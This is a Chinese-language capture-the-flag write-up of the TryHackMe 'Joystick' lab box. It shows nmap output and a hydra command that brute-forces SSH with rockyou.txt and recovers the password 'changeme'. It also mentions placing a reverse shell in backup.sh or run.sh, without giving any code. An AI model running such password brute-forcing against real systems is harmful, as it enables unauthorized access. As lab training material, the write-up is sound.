TryHackMe-Joystick

靶机链接

信息收集

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-23 09:57 CST
Nmap scan report for 192.168.10.154
Host is up (0.00033s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: got code 500 "OOPS: vsftpd: refusing to run with writable root inside chroot()".
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c7:ce:5d:fa:24:68:3a:10:63:f9:28:1b:f4:6d:e5:bc (RSA)
| 256 6b:7b:f5:12:e0:db:bb:b0:ca:f8:f8:c0:84:bc:27:e6 (ECDSA)
|_ 256 1b:d4:20:23:d0:5b:32:16:ad:c2:a9:cd:99:1c:e6:6e (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: JoyStick Gaming
25565/tcp open minecraft Minecraft 1.13.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

信息泄露,ftp不工作,user steve应该是ssh用户.这段话也提到了password,猜测是弱密码,尝试爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ hydra -l steve -P ~/tools/rockyou.txt ssh://192.168.10.154 -t 64
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-06-23 10:16:47
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344400 login tries (l:1/p:14344400), ~224132 tries per task
[DATA] attacking ssh://192.168.10.154:22/

[STATUS] 797.00 tries/min, 797 tries in 00:01h, 14343696 to do in 299:58h, 64 active
[STATUS] 583.00 tries/min, 1749 tries in 00:03h, 14342780 to do in 410:02h, 64 active
[STATUS] 519.00 tries/min, 3633 tries in 00:07h, 14340896 to do in 460:32h, 64 active
[22][ssh] host: 192.168.10.154 login: steve password: changeme
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 51 final worker threads did not complete until end.
[ERROR] 51 targets did not resolve or could not be connected
[ERROR] 0 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-06-23 10:24:06

提权

登录成功.

没想到这么简单..

可以往backup.sh或者是run.sh里写反弹shell

总结

靶机作者的writeup里写到

As a final item of note, this box is meant as a counter modern capture-the-flag design through the inclusion of services which simply don’t work and with unconventional construction logic through the lens of a younger admin. Careful thought was taken to use commands, instructions, and commit mistakes (i.e. misconfigurations and typos) akin to that which a junior admin would make and use.
最后要注意的是,该盒子通过包含一些根本无法使用的服务以及不合常规的构建逻辑(通过年轻管理员的眼光),成为一种反现代的标志设计。 仔细考虑过使用命令,指令和提交错误(即,错误的配置和错别字),类似于初级管理员会使用和执行的错误。